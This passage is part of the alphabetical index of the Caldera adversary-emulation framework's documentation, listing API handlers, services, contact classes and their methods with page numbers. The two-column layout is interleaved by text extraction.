method), 181 check_config() (app.contacts.contact_ftp.Contact
build_parser() (app.objects.secondclass.c_parser.ParserSchema method), 159
method), 168 check_edge_target()
build_parserconfig() (app.objects.secondclass.c_parserconfig.ParserConfigSchema
(app.objects.secondclass.c_parserconfig.ParserConfigSchema method), 169
method), 169 check_fact_exists()
build_planner() (app.objects.c_planner.PlannerSchema (app.service.interfaces.i_knowledge_svc.KnowledgeServiceInterfa
method), 181 method), 188
build_plugin() (app.objects.c_plugin.PluginSchema check_fact_exists()
method), 182 (app.service.knowledge_svc.KnowledgeService
build_potential_abilities() method), 199
(app.service.rest_svc.RestService method), check_not_empty_string() (in module
205 app.api.v2.validation), 153
build_potential_links() check_permissions()
(app.service.rest_svc.RestService method), (app.service.auth_svc.AuthService method),
205 194
build_relationship() check_permissions()
(app.objects.secondclass.c_relationship.RelationshipSchema(app.service.interfaces.i_auth_svc.AuthServiceInterface
method), 170 method), 185
build_requirement() check_positive_integer() (in module
(app.objects.secondclass.c_requirement.RequirementSchemaapp.api.v2.validation), 153
method), 171 check_repeatable_abilities()
build_result() (app.objects.secondclass.c_result.ResultSchema (app.objects.c_adversary.Adversary method),
method), 171 175
build_rule() (app.objects.secondclass.c_rule.RuleSchemacheck_requirement()
method), 172 (app.utility.base_world.BaseWorld static
build_schedule() (app.objects.c_schedule.ScheduleSchema method), 210
method), 183 check_stopping_conditions()
build_source() (app.objects.c_source.SourceSchema (app.service.planning_svc.PlanningService
method), 183 method), 201
build_variation() (app.objects.secondclass.c_variation.VariationSchema
clean() (app.utility.base_object.BaseObject static
method), 172 method), 206
build_visibility() (app.objects.secondclass.c_visibility.VisibilitySchema
CLEANUP (app.objects.c_operation.Operation.States at-
method), 173 tribute), 179
clear_config() (app.utility.base_world.BaseWorld
C static method), 210
calculate_sleep() (app.objects.c_agent.Agent close() (app.objects.c_operation.Operation method),
method), 176 180
CalderaInfoSchema (class in CNAME (app.contacts.contact_dns.DnsRecordType at-
app.api.v2.schemas.caldera_info_schemas), tribute), 157
149 command (app.objects.secondclass.c_variation.Variation
CalderaInfoSchema.Meta (class in property), 172
app.api.v2.schemas.caldera_info_schemas), compile_go() (app.service.file_svc.FileSvc method),
149 198
CampaignPack (class in app.api.packs.campaign), 139 compile_go() (app.service.interfaces.i_file_svc.FileServiceInterface
222 Index
caldera
Index 223
caldera
224 Index
caldera
Index 225
caldera
226 Index
caldera
Index 227
caldera
get_adversary_by_id() (app.api.v2.managers.agent_api_manager.AgentApiManager
(app.api.v2.handlers.adversary_api.AdversaryApi method), 146
method), 140 get_deploy_commands_for_ability()
get_agent() (app.api.v2.managers.operation_api_manager.OperationApiManager
(app.api.v2.handlers.agent_api.AgentApi
method), 148 method), 141
get_agent_by_id() (app.api.v2.handlers.agent_api.AgentApi get_encryptor() (in module
method), 140 app.utility.file_decryptor), 211
get_agent_configuration() get_fact_origin() (app.service.interfaces.i_knowledge_svc.KnowledgeS
(app.service.rest_svc.RestService method), method), 188
205 get_fact_origin() (app.service.knowledge_svc.KnowledgeService
get_agents() (app.api.v2.handlers.agent_api.AgentApi method), 200
method), 140 get_fact_source_by_id()
get_all_objects() (app.api.v2.handlers.base_object_api.BaseObjectApi
(app.api.v2.handlers.fact_source_api.FactSourceApi
method), 141 method), 143
get_available_contact_reports() get_fact_sources() (app.api.v2.handlers.fact_source_api.FactSourceAp
(app.api.v2.handlers.contact_api.ContactApi method), 143
method), 142 get_facts() (app.api.v2.handlers.fact_api.FactApi
get_available_contact_reports() method), 142
(app.api.v2.managers.contact_api_manager.ContactApiManager
get_facts() (app.service.interfaces.i_knowledge_svc.KnowledgeServiceIn
method), 147 method), 188
get_beacons() (app.contacts.contact_gist.Contact get_facts() (app.service.knowledge_svc.KnowledgeService
method), 160 method), 200
get_beacons() (app.contacts.contact_slack.Contact get_facts_by_operation_id()
method), 161 (app.api.v2.handlers.fact_api.FactApi method),
get_bytes() (app.contacts.contact_dns.DnsAnswerObj 142
method), 156 get_file() (app.service.file_svc.FileSvc method), 198
get_bytes() (app.contacts.contact_dns.DnsResponse get_file() (app.service.interfaces.i_file_svc.FileServiceInterface
method), 157 method), 187
get_cleanup_links() get_filtered_config()
(app.service.interfaces.i_planning_svc.PlanningServiceInterface
(app.api.v2.managers.config_api_manager.ConfigApiManager
method), 190 method), 147
get_cleanup_links() get_finished_states()
(app.service.planning_svc.PlanningService (app.objects.c_operation.Operation class
method), 203 method), 180
get_config() (app.utility.base_world.BaseWorld static get_health_info() (app.api.v2.handlers.health_api.HealthApi
method), 210 method), 143
get_config_with_name() get_link_pin() (app.service.interfaces.i_rest_svc.RestServiceInterface
(app.api.v2.handlers.config_api.ConfigApi method), 191
method), 142 get_link_pin() (app.service.rest_svc.RestService
get_contact() (app.service.contact_svc.ContactService method), 205
method), 195 get_links() (app.service.interfaces.i_planning_svc.PlanningServiceInter
get_contact_report() method), 190
(app.api.v2.handlers.contact_api.ContactApi get_links() (app.service.planning_svc.PlanningService
method), 142 method), 203
get_contact_report() get_loaded_plugins()
(app.api.v2.managers.contact_api_manager.ContactApiManager(app.service.app_svc.AppService method),
method), 147 192
get_current_timestamp() get_meta_facts() (app.service.interfaces.i_knowledge_svc.KnowledgeSe
(app.utility.base_world.BaseWorld static method), 189
method), 210 get_meta_facts() (app.service.knowledge_svc.KnowledgeService
get_deploy_commands() method), 200
(app.api.v2.handlers.agent_api.AgentApi get_obfuscator_by_name()
method), 140 (app.api.v2.handlers.obfuscator_api.ObfuscatorApi
get_deploy_commands() method), 143
228 Index
caldera
get_obfuscators() (app.api.v2.handlers.obfuscator_api.ObfuscatorApi
(app.service.interfaces.i_file_svc.FileServiceInterface
method), 143 method), 187
get_object() (app.api.v2.handlers.base_object_api.BaseObjectApi
get_payload_packer() (app.service.file_svc.FileSvc
method), 141 method), 198
get_objective_by_id() get_permissions() (app.service.auth_svc.AuthService
(app.api.v2.handlers.objective_api.ObjectiveApi method), 194
method), 143 get_permissions() (app.service.interfaces.i_auth_svc.AuthServiceInterfa
get_objectives() (app.api.v2.handlers.objective_api.ObjectiveApi method), 185
method), 143 get_planner_by_id()
get_opcode() (app.contacts.contact_dns.DnsPacket (app.api.v2.handlers.planner_api.PlannerApi
method), 157 method), 144
get_operation_by_id() get_planners() (app.api.v2.handlers.planner_api.PlannerApi
(app.api.v2.handlers.operation_api.OperationApi method), 144
method), 144 get_plugin_by_name()
get_operation_event_logs() (app.api.v2.handlers.plugins_api.PluginApi
(app.api.v2.handlers.operation_api.OperationApi method), 145
method), 144 get_plugins() (app.api.v2.handlers.plugins_api.PluginApi
get_operation_event_logs() method), 145
(app.api.v2.managers.operation_api_manager.OperationApiManager
get_potential_links()
method), 148 (app.api.v2.handlers.operation_api.OperationApi
get_operation_link() method), 144
(app.api.v2.handlers.operation_api.OperationApi get_potential_links()
method), 144 (app.api.v2.managers.operation_api_manager.OperationApiMana
get_operation_link() method), 148
(app.api.v2.managers.operation_api_manager.OperationApiManager
get_potential_links()
method), 148 (app.service.interfaces.i_rest_svc.RestServiceInterface
get_operation_link_result() method), 191
(app.api.v2.handlers.operation_api.OperationApi get_potential_links()
method), 144 (app.service.rest_svc.RestService method),
get_operation_link_result() 205
(app.api.v2.managers.operation_api_manager.OperationApiManager
get_potential_links_by_paw()
method), 148 (app.api.v2.handlers.operation_api.OperationApi
get_operation_links() method), 144
(app.api.v2.handlers.operation_api.OperationApi get_preferred_executor()
method), 144 (app.objects.c_agent.Agent method), 176
get_operation_links() get_relationships()
(app.api.v2.managers.operation_api_manager.OperationApiManager
(app.api.v2.handlers.fact_api.FactApi method),
method), 148 142
get_operation_object() get_relationships()
(app.api.v2.managers.operation_api_manager.OperationApiManager
(app.service.interfaces.i_knowledge_svc.KnowledgeServiceInterfa
method), 148 method), 189
get_operation_report() get_relationships()
(app.api.v2.handlers.operation_api.OperationApi (app.service.knowledge_svc.KnowledgeService
method), 144 method), 200
get_operation_report() get_relationships_by_operation_id()
(app.api.v2.managers.operation_api_manager.OperationApiManager
(app.api.v2.handlers.fact_api.FactApi method),
method), 148 142
get_operations() (app.api.v2.handlers.operation_api.OperationApi
get_request_permissions()
method), 144 (app.api.v2.handlers.base_api.BaseApi
get_payload_file() (app.contacts.contact_ftp.FtpHandler method), 141
method), 159 get_response_code()
get_payload_name_from_uuid() (app.contacts.contact_dns.DnsPacket method),
(app.service.file_svc.FileSvc method), 198 157
get_payload_name_from_uuid() get_results() (app.contacts.contact_gist.Contact
Index 229
caldera
230 Index
caldera
Index 231
caldera
232 Index
caldera
Index 233
caldera
234 Index
caldera
Index 235
caldera
236 Index
caldera
Index 237
caldera
(app.api.v2.managers.base_api_manager.BaseApiManager
retrieve_compiled_file()
method), 146 (app.service.app_svc.AppService method),
replace_origin_link_id() 193
(app.objects.secondclass.c_link.Link method), retrieve_compiled_file()
167 (app.service.interfaces.i_app_svc.AppServiceInterface
report() (app.objects.c_operation.Operation method), method), 184
180 retrieve_config() (app.contacts.contact_gist.Contact
report() (in module app.service.contact_svc), 195 method), 160
request_has_valid_api_key() retrieve_config() (app.contacts.contact_slack.Contact
(app.service.auth_svc.AuthService method), method), 161
194 Rule (class in app.objects.secondclass.c_rule), 172
request_has_valid_user_session() RuleAction (class in app.utility.rule_set), 212
(app.service.auth_svc.AuthService method), RuleSchema (class in app.objects.secondclass.c_rule),
194 172
RequestBodyParseError, 152 RuleSet (class in app.utility.rule_set), 212
RequestUnparsableJsonError, 152 run() (app.contacts.handles.h_beacon.Handle static
RequestValidationError, 152 method), 154
Requirement (class in run() (app.objects.c_operation.Operation method), 180
app.objects.secondclass.c_requirement), run() (app.utility.base_obfuscator.BaseObfuscator
171 method), 206
RequirementSchema (class in RUN_ONE_LINK (app.objects.c_operation.Operation.States
app.objects.secondclass.c_requirement), attribute), 179
171 run_scheduler() (app.service.app_svc.AppService
RESERVED (app.objects.c_agent.Agent attribute), 175 method), 193
RESERVED (app.objects.secondclass.c_executor.Executor run_scheduler() (app.service.interfaces.i_app_svc.AppServiceInterface
attribute), 164 method), 184
RESERVED (app.objects.secondclass.c_link.Link at- RUNNING (app.objects.c_operation.Operation.States at-
tribute), 167 tribute), 179
response_code_mask (app.contacts.contact_dns.DnsPacket
attribute), 157 S
rest_core() (app.api.rest_api.RestApi method), 153 satisfied() (app.objects.secondclass.c_goal.Goal
rest_core_info() (app.api.rest_api.RestApi method), method), 166
153 save_fact() (app.objects.secondclass.c_link.Link
RestApi (class in app.api.rest_api), 153 method), 167
restore_state() (app.service.data_svc.DataService save_file() (app.service.file_svc.FileSvc method), 199
method), 197 save_file() (app.service.interfaces.i_file_svc.FileServiceInterface
restore_state() (app.service.interfaces.i_object_svc.ObjectServiceInterface
method), 187
method), 190 save_multipart_file_upload()
restore_state() (app.service.knowledge_svc.KnowledgeService (app.service.file_svc.FileSvc method), 199
method), 201 save_multipart_file_upload()
RestService (class in app.service.rest_svc), 205 (app.service.interfaces.i_file_svc.FileServiceInterface
RestServiceInterface (class in method), 187
app.service.interfaces.i_rest_svc), 191 save_state() (app.service.data_svc.DataService
Result (class in app.objects.secondclass.c_result), 171 method), 197
ResultSchema (class in save_state() (app.service.interfaces.i_object_svc.ObjectServiceInterface
app.objects.secondclass.c_result), 171 method), 190
resume_operations() save_state() (app.service.knowledge_svc.KnowledgeService
(app.service.app_svc.AppService method), method), 201
193 Schedule (class in app.objects.c_schedule), 182
resume_operations() ScheduleApi (class in
(app.service.interfaces.i_app_svc.AppServiceInterface app.api.v2.handlers.schedule_api), 145
method), 184 ScheduleApiManager (class in
retrieve() (app.utility.base_object.BaseObject static app.api.v2.managers.schedule_api_manager),
method), 207 148
238 Index
caldera
Index 239
caldera
161 T
start() (app.contacts.contact_udp.Contact method), task() (app.objects.c_agent.Agent method), 176
162 task_agent_with_ability()
start() (app.contacts.contact_websocket.Contact (app.service.interfaces.i_rest_svc.RestServiceInterface
method), 162 method), 191
start() (app.contacts.tunnels.tunnel_ssh.Tunnel task_agent_with_ability()
method), 156 (app.service.rest_svc.RestService method),
start_sniffer_untrusted_agents() 206
(app.service.app_svc.AppService method), TcpSessionHandler (class in
193 app.contacts.contact_tcp), 161
start_sniffer_untrusted_agents() teardown() (app.service.app_svc.AppService method),
(app.service.interfaces.i_app_svc.AppServiceInterface 193
method), 184 teardown() (app.service.interfaces.i_app_svc.AppServiceInterface
state (app.objects.c_operation.Operation property), 180 method), 184
states (app.objects.c_operation.Operation property), test (app.objects.secondclass.c_executor.Executor prop-
180 erty), 164
states (app.objects.secondclass.c_link.Link property), TIME_FORMAT (app.utility.base_world.BaseWorld at-
168 tribute), 210
status (app.objects.secondclass.c_link.Link property), trait (app.objects.c_source.Adjustment property), 183
168 trait (app.objects.secondclass.c_fact.Fact property),
stop() (app.contacts.contact_ftp.Contact method), 159 165
stop() (app.contacts.contact_websocket.Contact trim_links() (app.utility.base_planning_svc.BasePlanningService
method), 162 method), 209
stor() (app.contacts.contact_ftp.FtpHandler method), truncated() (app.contacts.contact_dns.DnsPacket
159 method), 157
store() (app.objects.c_ability.Ability method), 174 truncated_flag (app.contacts.contact_dns.DnsPacket
store() (app.objects.c_adversary.Adversary method), attribute), 157
175 Tunnel (class in app.contacts.tunnels.tunnel_ssh), 156
store() (app.objects.c_agent.Agent method), 176 TXT (app.contacts.contact_dns.DnsRecordType at-
store() (app.objects.c_data_encoder.DataEncoder tribute), 157
method), 177
store() (app.objects.c_obfuscator.Obfuscator method), U
178
unique (app.objects.c_ability.Ability property), 174
store() (app.objects.c_objective.Objective method),
unique (app.objects.c_adversary.Adversary property),
178
175
store() (app.objects.c_operation.Operation method),
unique (app.objects.c_agent.Agent property), 176
180
unique (app.objects.c_data_encoder.DataEncoder prop-
store() (app.objects.c_planner.Planner method), 181
erty), 177
store() (app.objects.c_plugin.Plugin method), 182
unique (app.objects.c_obfuscator.Obfuscator property),
store() (app.objects.c_schedule.Schedule method), 182
178
store() (app.objects.c_source.Source method), 183
unique (app.objects.c_objective.Objective property), 178
store() (app.objects.interfaces.i_object.FirstClassObjectInterface
unique (app.objects.c_operation.Operation property),
method), 163
180
store() (app.service.data_svc.DataService method),
unique (app.objects.c_planner.Planner property), 181
197
unique (app.objects.c_plugin.Plugin property), 182
store() (app.service.interfaces.i_data_svc.DataServiceInterface
unique (app.objects.c_schedule.Schedule property), 182
method), 186
unique (app.objects.c_source.Source property), 183
strip_yml() (app.utility.base_world.BaseWorld static
unique (app.objects.interfaces.i_object.FirstClassObjectInterface
method), 211
property), 163
submit_uploaded_file()
unique (app.objects.secondclass.c_fact.Fact property),
(app.contacts.contact_ftp.FtpHandler method),
165
159
unique (app.objects.secondclass.c_link.Link property),
SUCCESS (app.contacts.contact_dns.DnsResponseCodes
168
attribute), 158
240 Index
caldera
Index 241
caldera
242 Index
caldera
Index 243